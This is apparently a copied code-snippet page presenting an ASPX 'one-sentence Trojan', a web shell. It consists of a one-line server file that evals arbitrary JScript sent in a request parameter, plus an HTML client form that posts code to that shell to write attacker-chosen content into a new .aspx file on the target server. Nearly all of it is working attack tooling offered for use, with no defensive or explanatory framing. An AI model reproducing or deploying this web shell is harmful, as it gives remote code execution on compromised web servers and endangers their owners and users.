Min. aspx
Copy codeThe Code is as follows:
<% @ Page Language = "Jscript" %> <% eval (Request. Item ["z"], "unsafe"); %>
Copy codeThe Code is as follows:
<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312"/>
<Style type = "text/css">
Td, table, tr {
List-style: none;
Font-family: Verdana, Arial, Helvetica, sans-serif;
Font-size: 12px;
Line-height: 180%;
}
Input, textarea {
Width: 780px;
}
</Style>
<Title> aspx one-sentence Trojan client </title>
<Body bgcolor = "D4D0C8">
<Hr>
<Table width = "100%" border = "0" cellpadding = "4" cellspacing = "0" bgcolor = "# D4D0C8">
<Form action = "sdfsdf" method = "post" name = "sform" id = "sform">
<Tr>
<Td width = "74" align = "right" valign = "bottom"> URL: </td>
<Td width = "885" valign = "bottom"> <input name = "URL" type = "text" id = "URL" value = "http: // "/> </td>
</Tr>
<Tr>
<Td align = "right" valign = "top"> operation: </td>
<Td> <textarea name = z rows = 10 width = 45>
Var nonamed = new System. IO. StreamWriter (Server. MapPath ("name. aspx"), false );
Nonamed. Write (Request. Item ["l"]);
Nonamed. Close (); </textarea> </td>
</Tr>
<Tr>
<Td align = "right" valign = "top"> write content: </td>
<Td> <p>
<Textarea name = l rows = 13 width = 45> </textarea>
<Input type = "button" value = "submit" onclick = "javascript: document. sform. action = document. sform. URL. value; submit ();"/>
</P>
</Td>
</Tr>
<Tr>
<Td align = "right"> </td>
<Td>
<Div align = "left">
<P> server: min. aspx client: client.htm </p>
</Div>
</Td>
</Tr>
</Form>
</Table>
<Hr>
</BODY>
</HTML>